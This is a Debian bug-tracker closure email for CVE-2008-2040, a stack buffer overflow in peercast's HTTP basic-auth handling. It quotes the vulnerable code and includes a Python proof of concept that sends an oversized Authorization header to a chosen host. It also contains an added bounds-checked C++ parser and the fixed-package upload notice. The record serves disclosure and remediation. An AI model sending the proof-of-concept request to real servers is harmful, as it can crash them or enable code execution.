Your message dated Fri, 02 May 2008 11:02:08 +0000
with message-id <[EMAIL PROTECTED]>
and subject line Bug#478573: fixed in peercast 0.1218+svn20080104-1.1
has caused the Debian Bug report #478573,
regarding [peercast] CVE-2008-2040 stack-based buffer overflow in HTTP::getAuthUserPass function
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)
--
478573: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=478573
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: peercast
Severity: grave
Tags: security
X-Debbugs-CC: [EMAIL PROTECTED]
I found a security issue in the peercast server in the HTTP::getAuthUserPass function. I already contacted the upstream author 6 days ago and didn't get an answer yet so I am publishing this now.
From core/common/http.cpp:
105 void HTTP::getAuthUserPass(char *user, char *pass)
106 {
107     if (arg)
108     {
109         char *s = stristr(arg,"Basic");
110         if (s)
111         {
112             while (*s)
113                 if (*s++ == ' ')
114                     break;
115             String str;
116             str.set(s,String::T_BASE64);
117             str.convertTo(String::T_ASCII);
118             s = strstr(str.cstr(),":");
119             if (s)
120             {
121                 *s = 0;
122                 if (user)
123                     strcpy(user,str.cstr());
124                 if (pass)
125                     strcpy(pass,s+1);
This function is used if authentication to the peercast server is done by basic http auth rather than by a cookie. In line 116 the base64 encoded string is copied into str.
Note the set method is peercast's own implementation of set since it reimplements the String class. set looks like this:
From core/common/sys.h:
38 MAX_LEN = 256
...
62 void set(const char *p, TYPE t=T_ASCII)
63 {
64     strncpy(data,p,MAX_LEN-1);
65     data[MAX_LEN-1] = 0;
66     type = t;
67 }
In line 117 the string gets decoded and in line 118 and following the part before ':' in the decoded string gets copied into user and the part after it into pass.
From core/common/servhs.cpp:
558 bool Servent::handshakeAuth(HTTP &http,const char *args,bool local)
559 {
560     char user[64],pass[64];
561     user[0] = pass[0] = 0;
...
580     while (http.nextHeader())
581     {
582         char *arg = http.getArgStr();
583         if (!arg)
584             continue;
585
586         switch (servMgr->authType)
587         {
588             case ServMgr::AUTH_HTTPBASIC:
589                 if (http.isHeader("Authorization"))
590                     http.getAuthUserPass(user,pass);
591                 break;
user and pass are only declared to have 64 bytes (line 558) while the buffer used for the copy can store up to MAX_LEN (256) bytes (ok, minus the ':' here). Servent::handshakeAuth then calls the getAuthUserPass function, triggering a buffer overflow.
It's thus possible to crash the server and execute arbitrary code if the server allows http-basic authentication.
I already requested a CVE id for this.
An example configuration and PoC is attached.
Kind regards
Nico
--
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
[Server]
serverPort = 7144
autoServe = Yes
forceIP =
isRoot = No
maxBitrateOut = 0
maxRelays = 2
maxDirect = 0
maxRelaysPerChannel = 0
firewallTimeout = 30
forceNormal = No
rootMsg =
authType = http-basic
cookiesExpire = session
htmlPath = html/en
minPGNUIncoming = 10
maxPGNUIncoming = 20
maxServIn = 50
chanLog =
networkID = 00000000000000000000000000000000
[Broadcast]
broadcastMsgInterval = 10
broadcastMsg =
icyMetaInterval = 8192
broadcastID = 008145B5C0427118B595AF7D9E110000
hostUpdateInterval = 180
maxControlConnections = 3
rootHost = yp.peercast.org
[Client]
refreshHTML = 5
relayBroadcast = 30
minBroadcastTTL = 1
maxBroadcastTTL = 7
pushTries = 5
pushTimeout = 60
maxPushHops = 8
autoQuery = 0
queryTTL = 7
[Privacy]
password = s0mep4ss
maxUptime = 0
[Filter]
ip = 255.255.255.255
private = Yes
ban = No
network = Yes
direct = Yes
[End]
[Notify]
PeerCast = Yes
Broadcasters = Yes
TrackInfo = Yes
[End]
[Server1]
allowHTML = Yes
allowBroadcast = Yes
allowNetwork = Yes
allowDirect = Yes
[End]
[Server2]
allowHTML = No
allowBroadcast = Yes
allowNetwork = No
allowDirect = No
[End]
[Debug]
logDebug = No
logErrors = No
logNetwork = No
logChannel = No
pauseLog = No
idleSleepTime = 10
#!/usr/bin/env python
import sys, socket
port = 7144
buff = 'GET /http/ HTTP/1.1\n'
buff+= 'Connection: close\n'
buff+= 'Accept: */*\n'
buff+= 'Authorization: Basic OmZ' + 'vb29'*128 + 'vbwo=' + '\r\n'
if(len(sys.argv) < 2):
    print "ERR: please specify a hostname"
    sys.exit(-1)
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], port))
    s.send(buff)
except:
    print "ERR: socket()"
    sys.exit(-1)
--- End Message ---
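The report above shows the defect as a chain: a base64 credential is clipped to MAX_LEN-1 bytes by String::set, split at the first ':', and then copied with strcpy() into two 64-byte stack buffers whose sizes the callee never learns. The following is an added example written for this page, not peercast's code and not the fix shipped in the Debian package: a bounds-checked parser for the "Basic" header value in which every destination buffer size is passed explicitly and both components are length-checked before anything is copied. The function names (b64decode, splitUserPass, parseBasicAuth), the 256-byte decode buffer and the sample inputs are assumptions chosen to mirror the report; the oversized header in main() is built the same way as the attached PoC so the rejection path can be seen.

```cpp
#include <cstddef>
#include <cstring>
#include <strings.h>
#include <iostream>
#include <string>

// Added example, not peercast code. Names, signatures and the 256-byte decode
// buffer are assumptions chosen to mirror the report.

// Value of one base64 alphabet character, or -1 if it is not in the alphabet.
static int b64val(char c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

// Decodes base64 into out[0..outLen). Returns the decoded length, or -1 if a
// byte is outside the alphabet or the output would not fit. Unlike the
// String::set() shown in the report, an oversized credential is an error
// rather than something to silently clip.
static long b64decode(const char *in, unsigned char *out, size_t outLen)
{
    unsigned int acc = 0;
    int bits = 0;
    size_t n = 0;
    for (; *in && *in != '='; ++in) {
        int v = b64val(*in);
        if (v < 0) return -1;
        acc = (acc << 6) | (unsigned int)v;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n >= outLen) return -1;                 // output buffer full
            out[n++] = (unsigned char)((acc >> bits) & 0xffu);
        }
    }
    return (long)n;
}

// Splits "user:pass" into caller-provided buffers whose sizes are passed
// explicitly. Both lengths are checked before anything is copied; on any
// failure the buffers are left as empty strings and false is returned.
bool splitUserPass(const char *decoded, char *user, size_t userLen,
                   char *pass, size_t passLen)
{
    if (user && userLen) user[0] = 0;
    if (pass && passLen) pass[0] = 0;
    if (!decoded || (user && !userLen) || (pass && !passLen)) return false;

    const char *colon = strchr(decoded, ':');
    if (!colon) return false;

    size_t uLen = (size_t)(colon - decoded);
    size_t pLen = strlen(colon + 1);
    if (user && uLen >= userLen) return false;          // no room for the NUL
    if (pass && pLen >= passLen) return false;

    if (user) { memcpy(user, decoded, uLen); user[uLen] = 0; }
    if (pass) { memcpy(pass, colon + 1, pLen); pass[pLen] = 0; }
    return true;
}

// Parses an Authorization header value ("Basic <base64>") into user/pass.
// Returns false for a different scheme or any malformed/oversized credential.
bool parseBasicAuth(const char *headerValue, char *user, size_t userLen,
                    char *pass, size_t passLen)
{
    if (user && userLen) user[0] = 0;
    if (pass && passLen) pass[0] = 0;
    if (!headerValue || strncasecmp(headerValue, "Basic ", 6) != 0) return false;

    const char *b64 = headerValue + 6;
    while (*b64 == ' ') ++b64;

    unsigned char decoded[256];                         // same bound as MAX_LEN
    long n = b64decode(b64, decoded, sizeof(decoded) - 1);
    if (n < 0) return false;
    decoded[n] = 0;
    if (memchr(decoded, 0, (size_t)n)) return false;    // embedded NUL: reject
    return splitUserPass((const char *)decoded, user, userLen, pass, passLen);
}

int main()
{
    char user[64], pass[64];                            // as in handshakeAuth
    // Constructed inputs: a normal credential ("admin:secret") and a header
    // built like the attached PoC, which decodes to far more than 255 bytes.
    std::string ok = "Basic YWRtaW46c2VjcmV0";
    std::string big = "Basic OmZ";
    for (int i = 0; i < 128; ++i) big += "vb29";
    big += "vbwo=";

    bool a = parseBasicAuth(ok.c_str(), user, sizeof user, pass, sizeof pass);
    std::cout << "normal: " << (a ? "accepted" : "rejected")
              << " user=" << user << " pass=" << pass << "\n";
    bool b = parseBasicAuth(big.c_str(), user, sizeof user, pass, sizeof pass);
    std::cout << "PoC:    " << (b ? "accepted" : "rejected") << "\n";
    return 0;
}
```

The design point is that the size of the destination travels with the pointer: getAuthUserPass(char *user, char *pass) cannot be made safe from inside, because the callee has no way to know that handshakeAuth gave it 64 bytes. Passing the sizes and checking before the copy turns the overflow into a rejected login, which is also the event worth logging on the server side.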
--- Begin Message ---
Source: peercast
Source-Version: 0.1218+svn20080104-1.1
We believe that the bug you reported is fixed in the latest version of
peercast, which is due to be installed in the Debian FTP archive:
peercast-handlers_0.1218+svn20080104-1.1_all.deb
to pool/main/p/peercast/peercast-handlers_0.1218+svn20080104-1.1_all.deb
peercast-servent_0.1218+svn20080104-1.1_all.deb
to pool/main/p/peercast/peercast-servent_0.1218+svn20080104-1.1_all.deb
peercast_0.1218+svn20080104-1.1.diff.gz
to pool/main/p/peercast/peercast_0.1218+svn20080104-1.1.diff.gz
peercast_0.1218+svn20080104-1.1.dsc
to pool/main/p/peercast/peercast_0.1218+svn20080104-1.1.dsc
peercast_0.1218+svn20080104-1.1_amd64.deb
to pool/main/p/peercast/peercast_0.1218+svn20080104-1.1_amd64.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Nico Golde <[EMAIL PROTECTED]> (supplier of updated peercast package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Fri, 02 May 2008 12:44:34 +0200
Source: peercast
Binary: peercast-servent peercast peercast-handlers
Architecture: source all amd64
Version: 0.1218+svn20080104-1.1
Distribution: unstable
Urgency: high
Maintainer: Romain Beauxis <[EMAIL PROTECTED]>
Changed-By: Nico Golde <[EMAIL PROTECTED]>
Description:
peercast - P2P audio and video streaming servent
peercast-handlers - P2P audio and video streaming handlers
peercast-servent - P2P audio and video streaming servent (dummy package)
Closes: 478573
Changes:
peercast (0.1218+svn20080104-1.1) unstable; urgency=high
.
* Non-maintainer upload by the Security Team.
* This update addresses the following security issue:
- CVE-2008-2040: stack-based buffer overflow in the
HTTP::getAuthUserPass function leading to remote DoS
or arbitrary code execution if peercast is configured
to use http-basic authentication (Closes: #478573).
Checksums-Sha1:
9c44bc5d221a820b5c65dd45fec7594a4642b35c 1142 peercast_0.1218+svn20080104-1.1.dsc
edc177024da645e969838f61c56ce9c93e519e32 9956 peercast_0.1218+svn20080104-1.1.diff.gz
8ac38683d3a489c31584c04614c272e91da4b53d 3784 peercast-servent_0.1218+svn20080104-1.1_all.deb
529e8c1fca0ece55d8af14d6e9332bb0ce7bd270 6908 peercast-handlers_0.1218+svn20080104-1.1_all.deb
6bba22f7e8a28a2c0464e07825734c2633d07dd9 200278 peercast_0.1218+svn20080104-1.1_amd64.deb
Checksums-Sha256:
27bb594d4b66138131a53d6204e0fe4fcf690f943b4782395eaa8540fc08cb87 1142 peercast_0.1218+svn20080104-1.1.dsc
5cdcaac114a132202c6258603953fbdecb9f6941a8dc2431e577d9544406069a 9956 peercast_0.1218+svn20080104-1.1.diff.gz
5259ec71211bbb91b0bf7447bc50e074ca2a0e19362f57999e62489ee818a9ce 3784 peercast-servent_0.1218+svn20080104-1.1_all.deb
4713b8d72e5afbcc48f5f849442b3c14aee4206193e8f687101354cf6dfc175a 6908 peercast-handlers_0.1218+svn20080104-1.1_all.deb
c7bd5525327058b207702ea36dc12decd8cd95b1b184cbf1fdea7e5e6d3ba56f 200278 peercast_0.1218+svn20080104-1.1_amd64.deb
Files:
31301f18409e31ddac40f89dc8ac2b3f 1142 sound optional peercast_0.1218+svn20080104-1.1.dsc
98cbcc57586e3c39488adbd075d71908 9956 sound optional peercast_0.1218+svn20080104-1.1.diff.gz
cfd41041fb026aed4240214017c14c88 3784 sound optional peercast-servent_0.1218+svn20080104-1.1_all.deb
a54955b37b0205e005bbbb93efac0164 6908 sound optional peercast-handlers_0.1218+svn20080104-1.1_all.deb
3c7c94e943a2f5ebeb7b3835a6ebf009 200278 sound optional peercast_0.1218+svn20080104-1.1_amd64.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFIGvNRHYflSXNkfP8RAn8wAKCi22X2JDvzM4VTVEctcccqskhKmgCfUTuO
wRlEneLrE9SIy9zUZTFcaWA=
=5cuj
-----END PGP SIGNATURE-----
--- End Message ---